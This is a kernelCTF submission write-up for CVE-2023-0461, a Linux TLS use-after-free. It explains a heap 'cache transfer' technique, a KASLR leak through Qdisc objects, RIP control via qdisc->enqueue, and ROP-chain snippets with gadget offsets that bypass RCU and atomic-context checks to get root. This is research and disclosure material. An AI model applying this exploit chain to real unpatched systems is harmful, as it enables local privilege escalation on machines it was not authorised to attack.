# kernelCTF: add CVE-2023-0461_mitigation #31

Merged 8 commits on Aug 24, 2023
`pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md` (208 additions):
# Attacking Objects

- **Heap grooming**: cbq_class + pfifo Qdisc [kmalloc-512]
- **Cache transfer**: fqdir (bucket_table pointer) [UAF from kmalloc-512 to dyn-kmalloc-1k]
- **Information leak/KASLR bypass**: user_key_payload + tbf Qdisc (tbf_qdisc_ops) [dyn-kmalloc-1k]
- **RIP control**: tbf Qdisc (RIP hijacked via qdisc->enqueue()) [dyn-kmalloc-1k]

# TL;DR

Transfer exploitation primitives from a fixed to a dynamic cache by abusing fqdir objects, turning a Use-After-Free in kmalloc-512 into one in dyn-kmalloc-1k.

Once in the dynamic cache, corrupt a user_key_payload structure with a Qdisc object and leak the tbf_qdisc_ops pointer to bypass KASLR.

Finally, corrupt the Qdisc structure and send data to the respective network interface to hijack control flow when packets are enqueued.

# Overview

Note: This exploit originally targeted the `mitigation-6.1-broken` instance; it was later slightly modified to work on `mitigation-6.1-v2`.
The technique used to compromise both instances remains the same.

---

In the Linux kernel, there are multiple objects allocated in fixed caches that contain pointers to other structures allocated in dynamic caches.

The [fqdir](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_frag.h#L12) structure is an example: it is [allocated](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L186) in kmalloc-512 when a new network namespace [is initialized](https://elixir.bootlin.com/linux/v6.1/source/net/core/net_namespace.c#L332), while its [bucket_table](https://elixir.bootlin.com/linux/v6.1/source/include/linux/rhashtable.h#L76) pointer (`fqdir->rhashtable.tbl`) is allocated in dyn-kmalloc-1k ([fqdir_init()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L195) -> [rhashtable_init()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L1015) -> [bucket_table_alloc()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L175)).

```c
/* Per netns frag queues directory */
struct fqdir {
/* sysctls */
long high_thresh;
long low_thresh;
int timeout;
int max_dist;
struct inet_frags *f;
struct net *net;
bool dead;
struct rhashtable rhashtable ____cacheline_aligned_in_smp; // ***

/* Keep atomic mem on separate cachelines in structs that include it */
atomic_long_t mem ____cacheline_aligned_in_smp;
struct work_struct destroy_work;
struct llist_node free_list;
};

struct rhashtable {
struct bucket_table __rcu *tbl; // ***
unsigned int key_len;
unsigned int max_elems;
struct rhashtable_params p;
bool rhlist;
struct work_struct run_work;
struct mutex mutex;
spinlock_t lock;
atomic_t nelems;
};

struct bucket_table {
unsigned int size;
unsigned int nest;
u32 hash_rnd;
struct list_head walkers;
struct rcu_head rcu;
struct bucket_table __rcu *future_tbl;
struct lockdep_map dep_map;
struct rhash_lock_head __rcu *buckets[] ____cacheline_aligned_in_smp;
};
```

The idea behind the technique used in this exploit is that by corrupting this kind of object in a fixed cache, via a slab use-after-free/double-free or a slab out-of-bounds write, it is possible to transfer exploitation primitives from a fixed to a dynamic cache, bypassing the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE.

Once in the dynamic cache, elastic objects can be "unlocked" to complete the exploitation process. In this writeup, I refer to this attack as a cache transfer.

# Exploit Analysis

The exploit consists of three stages:

- Cache transfer (UAF from kmalloc-512 to dyn-kmalloc-1k)
- KASLR bypass (in dyn-kmalloc-1k)
- RIP-control (in dyn-kmalloc-1k)

## Cache Transfer
After initializing some dummy network interfaces and performing some heap grooming in kmalloc-512 with [cbq_class](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L71) and pfifo [Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) objects (both allocated by [cbq_change_class()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1394) ([1](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1527), [2](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1551)) when a new cbq traffic class is created), I exploited [CVE-2023-0461](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0461) to make the [icsk_ulp_data](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_connection_sock.h#L99) pointers of two sockets point to the same [tls_context](https://elixir.bootlin.com/linux/v6.1/source/include/net/tls.h#L235) in kmalloc-512.

When one of the sockets was freed, the tls_context structure was freed with it, causing a Use-After-Free: the icsk_ulp_data pointer of the other socket still pointed to the freed object. (Step 1.0 in exploit.c)

I then replaced the freed tls_context in kmalloc-512 with an fqdir structure; this way, freeing the second socket let me arbitrarily free the fqdir object. (Step 1.1 in exploit.c)

In the next step, I exploited the Use-After-Free by spraying fqdir objects again. This time the goal was to overlap another fqdir with the one just freed, so that their bucket_table pointers referenced the same table in dyn-kmalloc-1k. (Step 1.2 in exploit.c)

At this point, freeing one of the overlapped objects also freed the shared bucket_table ([fqdir_exit()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L218) -> [fqdir_work_fn()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L176) -> [rhashtable_free_and_destroy()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L1130) -> [bucket_table_free()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L109)), causing a Use-After-Free in dyn-kmalloc-1k: the bucket_table pointer of the other fqdir still pointed to the freed table. (Step 1.3 in exploit.c)

Now I only had to replace the freed table with a [user_key_payload](https://elixir.bootlin.com/linux/v6.1/source/include/keys/user-type.h#L27) structure; then, by freeing the second fqdir, I could arbitrarily free the user key and complete the cache transfer. (Steps 1.4 - 1.5 in exploit.c)

```c
struct user_key_payload {
struct rcu_head rcu;
unsigned short datalen; // ***
char data[] __aligned(__alignof__(u64)); // ***
};
```

## KASLR Bypass

Once in dyn-kmalloc-1k, I overlapped the freed key with a tbf [Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) structure (allocated by [qdisc_alloc()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_generic.c#L938)), overwriting the key's datalen with Qdisc.flags (0x10) and the first qword of the key payload with Qdisc.ops (`tbf_qdisc_ops` in this case). (Step 2.0 in exploit.c)

```c
struct Qdisc {
int (*enqueue)(struct sk_buff *skb,
struct Qdisc *sch,
struct sk_buff **to_free); // ***
struct sk_buff * (*dequeue)(struct Qdisc *sch);
unsigned int flags; // ***
u32 limit;
const struct Qdisc_ops *ops; // ***
struct qdisc_size_table __rcu *stab;
struct hlist_node hash;
u32 handle;
u32 parent;

struct netdev_queue *dev_queue;

struct net_rate_estimator __rcu *rate_est;
struct gnet_stats_basic_sync __percpu *cpu_bstats;
struct gnet_stats_queue __percpu *cpu_qstats;
int pad;
refcount_t refcnt;

/*
* For performance sake on SMP, we put highly modified fields at the end
*/
struct sk_buff_head gso_skb ____cacheline_aligned_in_smp;
struct qdisc_skb_head q;
struct gnet_stats_basic_sync bstats;
struct gnet_stats_queue qstats;
unsigned long state;
unsigned long state2; /* must be written under qdisc spinlock */
struct Qdisc *next_sched;
struct sk_buff_head skb_bad_txq;

spinlock_t busylock ____cacheline_aligned_in_smp;
spinlock_t seqlock;

struct rcu_head rcu;
netdevice_tracker dev_tracker;
/* private data */
long privdata[] ____cacheline_aligned;
};
```

After corrupting the user key, I leaked the `tbf_qdisc_ops` pointer from the `Qdisc` structure so I could bypass KASLR. (Step 2.1 in exploit.c)

## RIP-Control

In the final steps, I freed all the keys in dyn-kmalloc-1k, including the one corrupted by the Qdisc, and reallocated them to overwrite the Qdisc structure. I overwrote the `qdisc->enqueue()` function pointer with a stack-pivot gadget, storing the rest of the ROP chain in the same chunk. (Steps 3.0 - 3.1 in exploit.c)

Finally, I sent packets to the network interface to trigger the call to [dev_qdisc_enqueue()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3779) in [__dev_xmit_skb()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3825), hijacking control flow. (Step 3.2 in exploit.c)

Note that when `qdisc->enqueue()` is called, RSI (and RBP in other kernel builds) already contains the address of the corrupted Qdisc chunk itself, where the ROP-chain was stored, so it is not necessary to leak a heap address / know the address of the corrupted chunk.

## Post-RIP

After hijacking control flow, two problems arose. Since `qdisc->enqueue()` is called in an atomic context / RCU read-side critical section, returning to user space did not yield a root shell; instead, the kernel panicked with two error messages:

- `"Illegal context switch in RCU read-side critical section"`

- `"BUG: scheduling while atomic: [...]"`

Fortunately, I managed to bypass both of them.

To bypass "RCU read-side critical section", a write-what-where gadget was used in the ROP-chain to set `current->rcu_read_lock_nesting = 0`.

```c
// current = find_task_by_vpid(getpid())
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = getpid(); // pid
rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = 0x46c; // offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
rop[idx++] = 0; // 0
rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)
```

To bypass "scheduling while atomic" instead, the kernel was tricked into believing that an oops was in progress by setting [oops_in_progress](https://elixir.bootlin.com/linux/v6.1/source/include/linux/printk.h#L15) to 1:

```c
// Bypass "schedule while atomic": set oops_in_progress = 1
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = 1; // 1
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)
```

Indeed, if `oops_in_progress` contains a non-zero value, [__schedule_bug()](https://elixir.bootlin.com/linux/v6.1/source/kernel/sched/core.c#L5730) will simply return without triggering any error, and we can gracefully return to userspace.

# Additional information

mitigation-6.1-v2 update: After the `KMALLOC_SPLIT_VARSIZE` mitigation was enabled and some minor adjustments were made to the source code, exploit reliability improved to about 80%, even though limited time was dedicated to this aspect.
This may at first seem paradoxical, but it is actually a side effect of separating objects into multiple caches: slabs tend to be less prone to noise, which leads to increased stability.

Considering that my original exploit for this vulnerability, for a system without experimental mitigations, was only ~150 lines of code, did not require user namespaces, and was very stable, the experimental mitigations are very effective despite being bypassed by the technique described above, and have successfully stopped many of my other exploitation strategies. I will probably cover some of these failed (but very interesting!) attempts on [my blog](https://syst3mfailure.io).
---
# Exploitation techniques

To my knowledge, the following exploitation techniques are not publicly known or documented:

- **Cache transfer** (Mitigation bypass): In the Linux kernel, there are multiple structures allocated in fixed caches that contain pointers to other objects allocated in dynamic caches. These structures act as junction points between fixed and dynamic caches.

By corrupting this kind of object, it is possible to transfer exploitation primitives from a fixed to a dynamic cache, bypassing the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE.

For example, for this submission, I exploited [fqdir](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_frag.h#L12) objects and their [bucket_table](https://elixir.bootlin.com/linux/v6.1/source/include/linux/rhashtable.h#L76) pointers to cause a Use-After-Free in dyn-kmalloc-1k from kmalloc-512 (See exploit.md/comments in exploit.c for more details). Once in the dynamic cache, I could "unlock" elastic objects to complete the exploitation process.

The technique can be generalized to other fixed caches by looking for objects with similar properties. The vulnerability exploited here was a Use-After-Free, but the technique also applies to Out-Of-Bounds-Write vulnerabilities (e.g. partially overwriting a pointer to an object in a dynamic cache so that it points to another object in the slab, then tricking the kernel into freeing the wrong structure).


- **RIP-Control via Qdisc**: By overwriting the `enqueue()` function pointer of a Qdisc structure, it is possible to hijack control flow when packets are enqueued to the respective network interface by [dev_qdisc_enqueue()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3779) in [__dev_xmit_skb()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3825).

A heap leak is not required because when control flow is hijacked, RSI (and RBP in other kernel builds) already contains the address of the corrupted Qdisc chunk, where the ROP-chain was stored.

[Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) structures are allocated by [qdisc_alloc()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_generic.c#L938). The allocation size is determined by the size of the `privdata` flexible array. [Sometimes](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1551) the Qdisc size can be determined at compile time, so this object is particularly interesting: it can be used to hijack control flow in both fixed and dynamic caches.

For this submission, I used the tbf packet scheduler, with [tbf_sched_data](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_tbf.c#L97) as the private data of the Qdisc, so the object was allocated in dyn-kmalloc-1k.


# Post-RIP

- Sometimes, after RIP control, exploits do not work because the ROP-chain is executed in an atomic context. In that case the kernel panics showing a "scheduling while atomic" message.

For example, in [this very interesting kCTF writeup](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/), Kylebot hijacked control flow utilizing timerfd_ctx objects, overwriting `timerfd_ctx->tmr.function`, but "scheduling while atomic" prevented him from getting a root shell, so he had to opt for another strategy.

To get around this problem, the kernel can be tricked into believing that an oops is in progress by setting [oops_in_progress](https://elixir.bootlin.com/linux/v6.1/source/include/linux/printk.h#L15) to a non-zero value. This way
[__schedule_bug()](https://elixir.bootlin.com/linux/v6.1/source/kernel/sched/core.c#L5730) will return without triggering any error:

```c
// Bypass "schedule while atomic": set oops_in_progress = 1
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = 1; // 1
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)
```

- Another, similar problem arises when the ROP-chain is executed in an RCU read-side critical section. This one can be easily bypassed by setting `current->rcu_read_lock_nesting = 0`:

```c
// current = find_task_by_vpid(getpid())
rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
rop[idx++] = getpid(); // pid
rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
rop[idx++] = 0x46c; // offsetof(struct task_struct, rcu_read_lock_nesting)
rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
rop[idx++] = 0; // 0
rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)
```
---
- Requirements:
- Capabilities: No
- Kernel configuration: CONFIG_TLS or CONFIG_XFRM_ESPINTCP
- User namespaces required: No
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=734942cc4ea6478eed125af258da1bdbb4afe578 (tcp: ULP infrastructure)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2c02d41d71f90a5168391b6a5f2954112ba2307c (net/ulp: prevent ULP without clone op from entering the LISTEN status)
- Affected kernel versions: 4.13-rc1 - 6.2-rc3
- Affected component: net/tls
- Cause: Use-After-Free
- Syscall to disable: setsockopt TCP_ULP
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0461
- Description:
There is a use-after-free vulnerability in the Linux kernel that can be exploited to achieve local privilege escalation. Reaching the vulnerability requires the kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP, but the operation does not require any privilege. The bug is a use-after-free of the icsk_ulp_data field of a struct inet_connection_sock. When CONFIG_TLS is enabled, a user can install a TLS context (struct tls_context) on a connected TCP socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege.
---
```makefile
exploit:
	gcc -o exploit exploit.c -lkeyutils -O0 -static -s

prerequisites:
	sudo apt-get install libkeyutils-dev

run:
	./exploit

clean:
	rm exploit
```